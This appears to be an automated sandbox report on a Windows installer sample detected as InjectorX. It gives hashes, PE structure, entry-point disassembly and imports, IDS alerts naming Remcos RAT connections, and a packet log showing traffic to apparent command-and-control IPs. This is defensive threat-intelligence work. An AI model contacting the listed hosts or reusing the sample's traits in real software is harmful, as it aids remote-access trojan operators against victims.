                                          SHA-512:4DDE50C0B37E51B944A7A61866730E53E96773E28C35260DCAE1EB38805251C3BA8E72C5D33AE2CB8D7486A4D3C6C180EC4560E3C20A6C535CA3A70AAC158710
                                          Malicious:false
                                          Process:C:\Users\user\Desktop\SecuriteInfo.com.Win32.InjectorX-gen.20521.11680.exe
                                          File Type:MS Windows shortcut, Item id list present, Has Relative path, Has Working directory, ctime=Sun Dec 31 23:06:32 1600, mtime=Sun Dec 31 23:06:32 1600, atime=Sun Dec 31 23:06:32 1600, length=0, window=hide
                                          Category:dropped
                                          Size (bytes):1200
                                          Entropy (8bit):3.1112375460820725
                                          Encrypted:false
                                          SSDEEP:12:8wl0OsXowAOcQ/tz+7RafgKDI/OuV4lI/GP+RKQ1AAB0oRKMJEbWl5y6p+uy/3Ny:8VLDaRMgKRZS/l9aG7r8WLJwV9HAvqy
                                          MD5:3EAD1E4300B5A3436DC9731166AB522E
                                          SHA1:C771A15FCA04CD65F15D93F7490CD3A08F03A5BA
                                          SHA-256:DB764385D61F89ECC0A66779958F3338784CF22472CF19EC708EEFB88ADC5857
                                          SHA-512:9B3F818EDE92BE004F23BCDF2FC6C95379930381C4FBC486608356B4CC7132F49C1930A20FA61697107ED53B0E833E025D2B92AA07015736C1C2FAC44DD66BDD
                                          Malicious:false
                                          Preview:L..................F.............................................................P.O. .:i.....+00.../C:\...................P.1...........Users.<............................................U.s.e.r.s.....P.1...........user.<............................................j.o.n.e.s.....V.1...........AppData.@............................................A.p.p.D.a.t.a.....P.1...........Local.<............................................L.o.c.a.l.....N.1...........Temp..:............................................T.e.m.p.....b.1...........nsmE387.tmp.H............................................n.s.m.E.3.8.7...t.m.p.....\.2...........cueca.Stu.D............................................c.u.e.c.a...S.t.u.......7.....\.U.s.e.r.s.\.j.o.n.e.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.n.s.m.E.3.8.7...t.m.p.\.c.u.e.c.a...S.t.u.S.C.:.\.U.s.e.r.s.\.j.o.n.e.s.\.A.p.p.D.a.t.a.\.R.o.a.m.i.n.g.\.i.n.t.e.r.c.e.s.s.i.o.n.a.t.e.\.F.a.v.o.u.r.a.b.l.i.e.s.1.1.7.\.s.u.l.f.o.n.y.l.u.r.e.a.\.P.l.a.y.l.e.t..
                                          File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                          Entropy (8bit):6.298838855552093
                                          TrID:
                                          • Win32 Executable (generic) a (10002005/4) 99.96%
                                          • Generic Win/DOS Executable (2004/3) 0.02%
                                          • DOS Executable Generic (2002/1) 0.02%
                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                          File name:SecuriteInfo.com.Win32.InjectorX-gen.20521.11680.exe
                                          File size:990'768 bytes
                                          MD5:450228d72f9f726b645c55bbbc6db905
                                          SHA1:b26075c51a4681f2ff7407188f5e9480545a7aca
                                          SHA256:9124d7696d2b94e7959933c3f7a8f68e61a5ce29cd5934a4d0379c2193b126be
                                          SHA512:4795d090447d237cbe1a044ffe78e8cd0c9be358df778673b4713eab2c324056a7701d22b827b95b2413845089fa71ac81a4f47cc8bcdbabad34845e64b4e090
                                          SSDEEP:12288:5Ly0W0exb+S7/6eALmQXhts30QmskXnnAEkINz3WSVgl:5Ly05wCmQXw30Ek3AgNz3Sl
                                          TLSH:8B25F06931B4B1C9E486D6351BC0A329A1B4BD783A43925EF3507FFF767C64AAE00742
                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pf..Pf..Pf.*_9..Pf..Pg.LPf.*_;..Pf..sV..Pf..V`..Pf.Rich.Pf.........................PE..L...'.uY.................d...*.....
                                          Icon Hash:71ec71330f4c2a18
                                          Entrypoint:0x40333d
                                          Entrypoint Section:.text
                                          Digitally signed:true
                                          Imagebase:0x400000
                                          Subsystem:windows gui
                                          Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                          DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                          Time Stamp:0x59759527 [Mon Jul 24 06:35:19 2017 UTC]
                                          TLS Callbacks:
                                          CLR (.Net) Version:
                                          OS Version Major:4
                                          OS Version Minor:0
                                          File Version Major:4
                                          File Version Minor:0
                                          Subsystem Version Major:4
                                          Subsystem Version Minor:0
                                          Import Hash:b34f154ec913d2d2c435cbd644e91687
                                          Signature Valid:false
                                          Signature Issuer:CN="Thereat Relativitetsteoris ", E=Cerement@Orthron.Sj, L=Stutton, S=England, C=GB
                                          Signature Validation Error:A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
                                          Error Number:-2146762487
                                          Not Before, Not After
                                          • 06/12/2023 07:24:20 05/12/2026 07:24:20
                                          Subject Chain
                                          • CN="Thereat Relativitetsteoris ", E=Cerement@Orthron.Sj, L=Stutton, S=England, C=GB
                                          Version:3
                                          Thumbprint MD5:CF61656CE4135F82DC50FE57878C334B
                                          Thumbprint SHA-1:E0554B29143002CC0960A94B86DC2BF6918F135E
                                          Thumbprint SHA-256:F21576A3441DE192EFE7335AC36241CA1116B0F66FD80AF2E989CBF8ADF4D9E9
                                          Serial:456E11F23B48550691D0A2F4700B9A60C597D834
                                          Instruction
                                          sub esp, 000002D4h
                                          push ebx
                                          push esi
                                          push edi
                                          push 00000020h
                                          pop edi
                                          xor ebx, ebx
                                          push 00008001h
                                          mov dword ptr [esp+14h], ebx
                                          mov dword ptr [esp+10h], 0040A2E0h
                                          mov dword ptr [esp+1Ch], ebx
                                          call dword ptr [004080A8h]
                                          call dword ptr [004080A4h]
                                          and eax, BFFFFFFFh
                                          cmp ax, 00000006h
                                          mov dword ptr [0042A20Ch], eax
                                          je 00007FDB20E7B493h
                                          push ebx
                                          call 00007FDB20E7E729h
                                          cmp eax, ebx
                                          je 00007FDB20E7B489h
                                          push 00000C00h
                                          call eax
                                          mov esi, 004082B0h
                                          push esi
                                          call 00007FDB20E7E6A3h
                                          push esi
                                          call dword ptr [00408150h]
                                          lea esi, dword ptr [esi+eax+01h]
                                          cmp byte ptr [esi], 00000000h
                                          jne 00007FDB20E7B46Ch
                                          push 0000000Ah
                                          call 00007FDB20E7E6FCh
                                          push 00000008h
                                          call 00007FDB20E7E6F5h
                                          push 00000006h
                                          mov dword ptr [0042A204h], eax
                                          call 00007FDB20E7E6E9h
                                          cmp eax, ebx
                                          je 00007FDB20E7B491h
                                          push 0000001Eh
                                          call eax
                                          test eax, eax
                                          je 00007FDB20E7B489h
                                          or byte ptr [0042A20Fh], 00000040h
                                          push ebp
                                          call dword ptr [00408044h]
                                          push ebx
                                          call dword ptr [004082A0h]
                                          mov dword ptr [0042A2D8h], eax
                                          push ebx
                                          lea eax, dword ptr [esp+34h]
                                          push 000002B4h
                                          push eax
                                          push ebx
                                          push 004216A8h
                                          call dword ptr [00408188h]
                                          push 0040A2C8h
                                          Programming Language:
                                          • [EXP] VC++ 6.0 SP5 build 8804
                                          Name | Virtual Address | Virtual Size | Is in Section
                                          IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                                          IMAGE_DIRECTORY_ENTRY_IMPORT | 0x84fc | 0xa0 | .rdata
                                          IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x5c000 | 0x6c2d0 | .rsrc
                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                                          IMAGE_DIRECTORY_ENTRY_SECURITY | 0xf1498 | 0x998 |
                                          IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
                                          IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                          IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                                          IMAGE_DIRECTORY_ENTRY_IAT | 0x8000 | 0x2b0 | .rdata
                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                                          IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                                          Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                          .text | 0x1000 | 0x626d | 0x6400 | b2dd5d917f94d75528a11411abe5681c | False | 0.6569921875 | data | 6.423132440637118 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                          .rdata | 0x8000 | 0x138e | 0x1400 | 2914bac53cd4485c9822093463e4eea6 | False | 0.4509765625 | data | 5.146454805063938 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                          .data | 0xa000 | 0x20318 | 0x600 | c46c24ddc9bf88a6774bd207204164b9 | False | 0.4921875 | data | 3.906531854842304 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                          .ndata | 0x2b000 | 0x31000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                          .rsrc | 0x5c000 | 0x6c2d0 | 0x6c400 | 4f3d39c7e86d8cf2186d2c5dc01043a3 | False | 0.22987559540993072 | data | 3.0219143577609104 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                          Name | RVA | Size | Type | Language | Country | ZLIB Complexity
                                          RT_ICON | 0x5c478 | 0x42028 | Device independent bitmap graphic, 256 x 512 x 32, image size 270336 | English | United States | 0.18922167648016097
                                          RT_ICON | 0x9e4a0 | 0x10828 | Device independent bitmap graphic, 128 x 256 x 32, image size 67584 | English | United States | 0.24856559801253994
                                          RT_ICON | 0xaecc8 | 0x94a8 | Device independent bitmap graphic, 96 x 192 x 32, image size 38016 | English | United States | 0.29340971200336347
                                          RT_ICON | 0xb8170 | 0x5488 | Device independent bitmap graphic, 72 x 144 x 32, image size 21600 | English | United States | 0.31090573012939005
                                          RT_ICON | 0xbd5f8 | 0x4228 | Device independent bitmap graphic, 64 x 128 x 32, image size 16896 | English | United States | 0.30196032120925836
                                          RT_ICON | 0xc1820 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9600 | English | United States | 0.3432572614107884
                                          RT_ICON | 0xc3dc8 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4224 | English | United States | 0.36843339587242024
                                          RT_ICON | 0xc4e70 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors | English | United States | 0.4906716417910448
                                          RT_ICON | 0xc5d18 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors | English | United States | 0.6137184115523465
                                          RT_ICON | 0xc65c0 | 0x668 | Device independent bitmap graphic, 48 x 96 x 4, image size 1152 | English | United States | 0.3
                                          RT_ICON | 0xc6c28 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors | English | United States | 0.3764450867052023
                                          RT_ICON | 0xc7190 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1088 | English | United States | 0.4920212765957447
                                          RT_ICON | 0xc75f8 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 512 | English | United States | 0.3897849462365591
                                          RT_ICON | 0xc78e0 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 128 | English | United States | 0.5135135135135135
                                          RT_DIALOG | 0xc7a08 | 0x100 | data | English | United States | 0.5234375
                                          RT_DIALOG | 0xc7b08 | 0x11c | data | English | United States | 0.6056338028169014
                                          RT_DIALOG | 0xc7c28 | 0xc4 | data | English | United States | 0.5918367346938775
                                          RT_DIALOG | 0xc7cf0 | 0x60 | data | English | United States | 0.7291666666666666
                                          RT_GROUP_ICON | 0xc7d50 | 0xca | data | English | United States | 0.6237623762376238
                                          RT_VERSION | 0xc7e20 | 0x16c | data | English | United States | 0.5769230769230769
                                          RT_MANIFEST | 0xc7f90 | 0x33e | XML 1.0 document, ASCII text, with very long lines (830), with no line terminators | English | United States | 0.5542168674698795
                                          DLL | Import
                                          KERNEL32.dll | SetEnvironmentVariableW, SetFileAttributesW, Sleep, GetTickCount, GetFileSize, GetModuleFileNameW, GetCurrentProcess, CopyFileW, SetCurrentDirectoryW, GetFileAttributesW, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, GetVersion, SetErrorMode, lstrlenW, lstrcpynW, GetDiskFreeSpaceW, ExitProcess, GetShortPathNameW, CreateThread, GetLastError, CreateDirectoryW, CreateProcessW, RemoveDirectoryW, lstrcmpiA, CreateFileW, GetTempFileNameW, WriteFile, lstrcpyA, MoveFileExW, lstrcatW, GetSystemDirectoryW, GetProcAddress, GetModuleHandleA, GetExitCodeProcess, WaitForSingleObject, lstrcmpiW, MoveFileW, GetFullPathNameW, SetFileTime, SearchPathW, CompareFileTime, lstrcmpW, CloseHandle, ExpandEnvironmentStringsW, GlobalFree, GlobalLock, GlobalUnlock, GlobalAlloc, FindFirstFileW, FindNextFileW, DeleteFileW, SetFilePointer, ReadFile, FindClose, lstrlenA, MulDiv, MultiByteToWideChar, WideCharToMultiByte, GetPrivateProfileStringW, WritePrivateProfileStringW, FreeLibrary, LoadLibraryExW, GetModuleHandleW
                                          USER32.dll | GetSystemMenu, SetClassLongW, EnableMenuItem, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongW, SetCursor, LoadCursorW, CheckDlgButton, GetMessagePos, LoadBitmapW, CallWindowProcW, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, ScreenToClient, GetWindowRect, GetDlgItem, GetSystemMetrics, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharPrevW, CharNextA, wsprintfA, DispatchMessageW, PeekMessageW, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, GetDC, SetTimer, SetWindowTextW, LoadImageW, SetForegroundWindow, ShowWindow, IsWindow, SetWindowLongW, FindWindowExW, TrackPopupMenu, AppendMenuW, CreatePopupMenu, EndPaint, CreateDialogParamW, SendMessageTimeoutW, wsprintfW, PostQuitMessage
                                          GDI32.dll | SelectObject, SetBkMode, CreateFontIndirectW, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
                                          SHELL32.dll | SHGetSpecialFolderLocation, ShellExecuteExW, SHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, SHFileOperationW
                                          ADVAPI32.dll | AdjustTokenPrivileges, RegCreateKeyExW, RegOpenKeyExW, SetFileSecurityW, OpenProcessToken, LookupPrivilegeValueW, RegEnumValueW, RegDeleteKeyW, RegDeleteValueW, RegCloseKey, RegSetValueExW, RegQueryValueExW, RegEnumKeyW
                                          COMCTL32.dll | ImageList_Create, ImageList_AddMasked, ImageList_Destroy
                                          ole32.dll | OleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance
Language of compilation system | Country where language is spoken | Map
English | United States |
| Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol |
|---|---|---|---|---|---|---|---|---|
| 2024-09-30T13:59:43.556757+0200 | 2803270 | ETPRO MALWARE Common Downloader Header Pattern UHCa | 2 | 192.168.2.4 | 49737 | 192.3.220.22 | 80 | TCP |
| 2024-09-30T13:59:47.052624+0200 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.4 | 49738 | 107.173.4.16 | 2404 | TCP |
| 2024-09-30T13:59:48.146382+0200 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.4 | 49739 | 107.173.4.16 | 2404 | TCP |
| 2024-09-30T13:59:48.254608+0200 | 2803304 | ETPRO MALWARE Common Downloader Header Pattern HCa | 3 | 192.168.2.4 | 49740 | 178.237.33.50 | 80 | TCP |
| 2024-09-30T13:59:55.947608+0200 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.4 | 49741 | 107.173.4.16 | 2404 | TCP |
| 2024-09-30T13:59:55.958911+0200 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.4 | 49742 | 107.173.4.16 | 2404 | TCP |
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                          Sep 30, 2024 13:59:43.923176050 CEST4973780192.168.2.4192.3.220.22
                                          Sep 30, 2024 13:59:43.923182964 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:43.923213959 CEST4973780192.168.2.4192.3.220.22
                                          Sep 30, 2024 13:59:43.923271894 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:43.923283100 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:43.923293114 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:43.923302889 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:43.923321962 CEST4973780192.168.2.4192.3.220.22
                                          Sep 30, 2024 13:59:43.923324108 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:43.923335075 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:43.923343897 CEST4973780192.168.2.4192.3.220.22
                                          Sep 30, 2024 13:59:43.923346043 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:43.923357964 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:43.923368931 CEST4973780192.168.2.4192.3.220.22
                                          Sep 30, 2024 13:59:43.923405886 CEST4973780192.168.2.4192.3.220.22
                                          Sep 30, 2024 13:59:43.923671007 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:43.923682928 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:43.923692942 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:43.923726082 CEST4973780192.168.2.4192.3.220.22
                                          Sep 30, 2024 13:59:43.923741102 CEST4973780192.168.2.4192.3.220.22
                                          Sep 30, 2024 13:59:43.923755884 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:43.923769951 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:43.923780918 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:43.923793077 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:43.923798084 CEST4973780192.168.2.4192.3.220.22
                                          Sep 30, 2024 13:59:43.923820972 CEST4973780192.168.2.4192.3.220.22
                                          Sep 30, 2024 13:59:43.923850060 CEST4973780192.168.2.4192.3.220.22
                                          Sep 30, 2024 13:59:43.923861027 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:43.923871994 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:43.923882961 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:43.923893929 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:43.923902035 CEST4973780192.168.2.4192.3.220.22
                                          Sep 30, 2024 13:59:43.923906088 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:43.923929930 CEST4973780192.168.2.4192.3.220.22
                                          Sep 30, 2024 13:59:43.923963070 CEST4973780192.168.2.4192.3.220.22
                                          Sep 30, 2024 13:59:43.924005032 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:43.924021006 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:43.924031973 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:43.924041986 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:43.924048901 CEST4973780192.168.2.4192.3.220.22
                                          Sep 30, 2024 13:59:43.924053907 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:43.924063921 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:43.924074888 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:43.924082994 CEST4973780192.168.2.4192.3.220.22
                                          Sep 30, 2024 13:59:43.924084902 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:43.924098969 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:43.924115896 CEST4973780192.168.2.4192.3.220.22
                                          Sep 30, 2024 13:59:43.924137115 CEST4973780192.168.2.4192.3.220.22
                                          Sep 30, 2024 13:59:43.924571991 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:43.924614906 CEST4973780192.168.2.4192.3.220.22
                                          Sep 30, 2024 13:59:43.924616098 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:43.924629927 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:43.924657106 CEST4973780192.168.2.4192.3.220.22
                                          Sep 30, 2024 13:59:43.924680948 CEST4973780192.168.2.4192.3.220.22
                                          Sep 30, 2024 13:59:43.924695969 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:43.924707890 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:43.924719095 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:43.924730062 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:43.924745083 CEST4973780192.168.2.4192.3.220.22
                                          Sep 30, 2024 13:59:43.924776077 CEST4973780192.168.2.4192.3.220.22
                                          Sep 30, 2024 13:59:43.924854040 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:43.924865007 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:43.924875021 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:43.924885988 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:43.924896002 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:43.924901009 CEST4973780192.168.2.4192.3.220.22
                                          Sep 30, 2024 13:59:43.924906969 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:43.924916983 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:43.924926043 CEST4973780192.168.2.4192.3.220.22
                                          Sep 30, 2024 13:59:43.924937010 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:43.924948931 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:43.924957037 CEST4973780192.168.2.4192.3.220.22
                                          Sep 30, 2024 13:59:43.924958944 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:43.924978018 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:43.924978971 CEST4973780192.168.2.4192.3.220.22
                                          Sep 30, 2024 13:59:43.924988985 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:43.924997091 CEST4973780192.168.2.4192.3.220.22
                                          Sep 30, 2024 13:59:43.925004959 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:43.925019026 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:43.925034046 CEST4973780192.168.2.4192.3.220.22
                                          Sep 30, 2024 13:59:43.925060987 CEST4973780192.168.2.4192.3.220.22
                                          Sep 30, 2024 13:59:43.925081968 CEST4973780192.168.2.4192.3.220.22
                                          Sep 30, 2024 13:59:43.925595999 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:43.925607920 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:43.925618887 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:43.925643921 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:43.925653934 CEST4973780192.168.2.4192.3.220.22
                                          Sep 30, 2024 13:59:43.925653934 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:43.925664902 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:43.925677061 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:43.925683975 CEST4973780192.168.2.4192.3.220.22
                                          Sep 30, 2024 13:59:43.925704956 CEST4973780192.168.2.4192.3.220.22
                                          Sep 30, 2024 13:59:43.925724983 CEST4973780192.168.2.4192.3.220.22
                                          Sep 30, 2024 13:59:43.925823927 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:43.925837040 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:43.925848007 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:43.925858974 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:43.925874949 CEST4973780192.168.2.4192.3.220.22
                                          Sep 30, 2024 13:59:43.925880909 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:43.925892115 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:43.925899982 CEST4973780192.168.2.4192.3.220.22
                                          Sep 30, 2024 13:59:43.925901890 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:43.925914049 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:43.925934076 CEST4973780192.168.2.4192.3.220.22
                                          Sep 30, 2024 13:59:43.925935030 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:43.925946951 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:43.925957918 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:43.925957918 CEST4973780192.168.2.4192.3.220.22
                                          Sep 30, 2024 13:59:43.925970078 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:43.925981045 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:43.925982952 CEST4973780192.168.2.4192.3.220.22
                                          Sep 30, 2024 13:59:43.925993919 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:43.926011086 CEST4973780192.168.2.4192.3.220.22
                                          Sep 30, 2024 13:59:43.926038980 CEST4973780192.168.2.4192.3.220.22
                                          Sep 30, 2024 13:59:43.926534891 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:43.926557064 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:43.926579952 CEST4973780192.168.2.4192.3.220.22
                                          Sep 30, 2024 13:59:43.926609993 CEST4973780192.168.2.4192.3.220.22
                                          Sep 30, 2024 13:59:44.012470961 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:44.012495995 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:44.012506962 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:44.012517929 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:44.012530088 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:44.012541056 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:44.012562037 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:44.012583017 CEST4973780192.168.2.4192.3.220.22
                                          Sep 30, 2024 13:59:44.012586117 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:44.012595892 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:44.012607098 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:44.012619019 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:44.012629986 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:44.012653112 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:44.012665987 CEST4973780192.168.2.4192.3.220.22
                                          Sep 30, 2024 13:59:44.012675047 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:44.012701035 CEST4973780192.168.2.4192.3.220.22
                                          Sep 30, 2024 13:59:44.012722969 CEST4973780192.168.2.4192.3.220.22
                                          Sep 30, 2024 13:59:44.012728930 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:44.012738943 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:44.012763023 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:44.012772083 CEST4973780192.168.2.4192.3.220.22
                                          Sep 30, 2024 13:59:44.012774944 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:44.012785912 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:44.012794971 CEST4973780192.168.2.4192.3.220.22
                                          Sep 30, 2024 13:59:44.012816906 CEST4973780192.168.2.4192.3.220.22
                                          Sep 30, 2024 13:59:44.012849092 CEST4973780192.168.2.4192.3.220.22
